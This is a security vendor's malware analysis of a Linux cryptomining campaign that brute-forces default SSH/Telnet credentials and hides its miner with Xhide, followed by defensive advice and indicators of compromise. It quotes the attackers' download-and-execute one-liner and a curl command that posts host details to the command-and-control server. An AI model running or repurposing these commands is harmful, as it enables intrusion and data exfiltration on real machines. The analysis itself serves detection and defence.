Cryptocurrency Miner Uses Hacking Tool Haiduc and App Hider Xhide to Brute Force Machines and Servers
By Augusto Remillano II and Jemimah Molina (Threats Analysts)
A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used by the miner to host the command for downloading the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS). The cryptocurrency-miner, a multi-component threat comprised of different Perl and Bash scripts, miner binaries, the application hider Xhide, and a scanner tool, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.
Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.
The threat also employs a process hider to conceal the miner binary, which makes a typical user more unlikely to notice the mining activity save for a drop in performance and suspicious network traffic. This method has been a known cover for threat actors that aim to scan, brute force, and mine.
The infection
The attacker starts by gaining access to a machine through weak or default credentials. Then, a command will be run on the compromised machine:
cd /tmp;wget hxxps://upajmeter[.]com/assets/.style/min;curl -O hxxps://upajmeter[.]com/assets/.style/min;chmod +x min;perl min;rm -rf min*
The initial file min (detected as Trojan.Perl.MALXMR.UWEJS) downloads another file min.sh (detected as Trojan.SH.MALXMR.UWEJS), which is the main shell script that installs the various components of this threat. After executing the main shell script, it will try to kill existing cryptocurrency-mining processes:
killall -9 rand rx rd tsm tsm2 haiduc a sparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr python cron ntpd start start.sh libssl sparky.sh
The shell script also downloads and executes the component file downloaders cron.sh and nano.sh (Trojan.SH.MALXMR.UWEJT), which are executed daily by the hour and every 30 minutes respectively. These files drop rcmd.sh (detected as Trojan.SH.MALXMR.UWEJU), which is responsible for regularly reporting back to the C&C via an HTTP post request on the status of the infected machine:
curl -d "info=POST&data=SERVER---> $(whoami)@$SERVERIP
DATE---> $(date)
SERV---> $(uname -a) ===> $(nproc) PROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)" hxxp://upajmeter[.]com/assets/.style/remote/info.php > /dev/null
The archived files
The shell script is also capable of downloading and extracting the miner archive monero.tgz (detected as Trojan.Linux.MALXMR.UWEJS) for the execution of its contents. The archive file contains the miner binaries, which can be executed by various shell and Perl scripts that are also contained in the file.
The contents of the archive file are primarily configuration files and those that execute various component files, such as config.txt, cpu.txt, h32 (Xhide 32-bit), h64 (Xhide 64-bit), pools.txt, run, startMSR, x, x.pl, xmr-stak, and xmrig. The binary Xhide is responsible for hiding cryptocurrency-mining processes through changing process names into “-bash”.
The main shell script then proceeds to download and extract the scanner archive sslm.tgz (detected as Trojan.Linux.SSHBRUTE.UWEJS) for execution. The archive houses the Telnet/SSH scanner binary, the corresponding shell and Perl scripts that will execute it, and the list of passwords that will be used for scanning.
The contents of the scanner archive include .pass (short password list used for random public IP blocks), pass (long password list used for private IP blocks), libssl (the UPX-packed Haiduc scanner), sparky.sh, start, start.pl, and start.sh.
The scanner would attempt to infect and gain control of devices in a private IP range (It will try to infect all devices in the same local network as the host machine) by brute forcing a list of credentials that contain 3,637 username and password combinations. It also tries to infect devices in the public IP range of {random number from 0-216}.0.0.0/8 by using a different, shorter credentials list. Based on the credentials used, the attack mostly targets servers related to databases, storages, gaming, and mining rigs.
If successful, the attacker will then be able to issue the aforementioned commands for cryptocurrency-mining.
Protecting devices from cryptocurrency-mining threats
The threat actors behind this cryptocurrency-miner have utilized Haiduc and Xhide, known and old tools that have been notoriously used for various malicious activities. These tools, combined with brute-forced weak credentials, can persist in systems while operating under the radar of traditional network security solutions. Such malware can also affect system performance and expose users to other forms of compromise.
While we haven’t seen widespread attacks from this threat actor yet, users should adopt security measures that can defend systems against any potential attacks, such as:
- Taking caution against known attack vectors such as unsolicited emails, socially engineered links and attachments, suspicious websites, and dubious third-party applications
- Changing devices’ default credentials to prevent unauthorized access
- Updating devices with the latest patches
- Regularly verifying that all created accounts are only used for legitimate purposes
Users can also consider adopting security solutions that can provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.
Users of the Trend Micro™ Deep Discovery Inspector (DDI) are protected from this threat via these rules, which cover the mining network traffic and C&C connection respectively:
- Rule 2573: MINER - TCP (Request)
- Rule 4313 - MALXMR - HTTP (Request)
Indicators of compromise (IoCs)
SHA-256
Filenames | Hashes | Trend Micro Pattern Detection | Notes |
config.txt | 91a80ee885d7586292260750a4129ad305fe252a39002cbde546e8161873a906 | Trojan.Win32.MALXMR.BJ | Config file |
cpu.txt | 60a1f3cf6a6a72e45bfb299839f25e872e016b6e1f9d465477224d0c6bb2d53a | Trojan.Win32.MALXMR.BJ | Config file |
cron.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file |
h32 | 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 | HackTool.Linux.XHide.GA | Xhide binary (32-bit) |
h64 | 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf | HackTool.Linux.XHide.GA | Xhide binary (64-bit) |
libssl | 6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4 | HackTool.Linux.SSHBRUTE.GA | Haiduc scanner (UPX packed) |
min | 07f6e31ffab85fe561c6f39aa3cf62c71017b790ee8eb1b028579ef982e861ab | Trojan.Perl.MALXMR.UWEJS | Downloads the main shell script |
min.sh | 3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460 | Trojan.SH.MALXMR.UWEJS | Main shell script |
monero.tgz | eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544 | Trojan.Linux.MALXMR.UWEJS | Miner archive |
nano.sh | fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e | Trojan.SH.MALXMR.UWEJT | Downloads component file |
pools.txt | cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57 | Trojan.Win32.MALXMR.BJ | Config file |
rcmd.sh | 46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff | Trojan.SH.MALXMR.UWEJU | Reports to C&C |
run | 420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1 | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component |
sparky.sh | 64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18 | Trojan.SH.SSHBRUTE.UWEJS | Executes scanner component |
sslm.tgz | 8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f | Trojan.Linux.SSHBRUTE.UWEJS | Scanner archive |
start | 5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b | Trojan.SH.SSHBRUTE.UWEJS | Executes component file |
start.sh | d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049 | Trojan.SH.SSHBRUTE.UWEJS | Executes component file |
startMSR | 473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb | Trojan.SH.MALXMR.UWEJW | Executes miner and hider component |
x | 78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d | Trojan.SH.MALXMR.UWEJS | Executes component file |
xmr-stak | 8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c | Coinminer.Linux.MALXMR.UWEKF | Miner binary |
xmrig | e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb | Coinminer.Linux.MALXMR.SMDSL64 | Miner binary |
Related malicious URLs
139[.]99[.]42[.]75:3333
pool[.]masari[.]hashvault[.]pro:3333
hxxps://upajmeter[.]com/assets/.style/min
hxxps://upajmeter[.]com/assets/.style/min.sh
hxxps://upajmeter[.]com/assets/.style/remote/cron.sh
hxxps://upajmeter[.]com/assets/.style/monero.tgz
hxxps://upajmeter[.]com/assets/.style/sslm.tgz
hxxps://upajmeter[.]com/assets/.style/remote/info.php
hxxps://upajmeter[.]com/assets/.style/remote/rcmd.sh
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.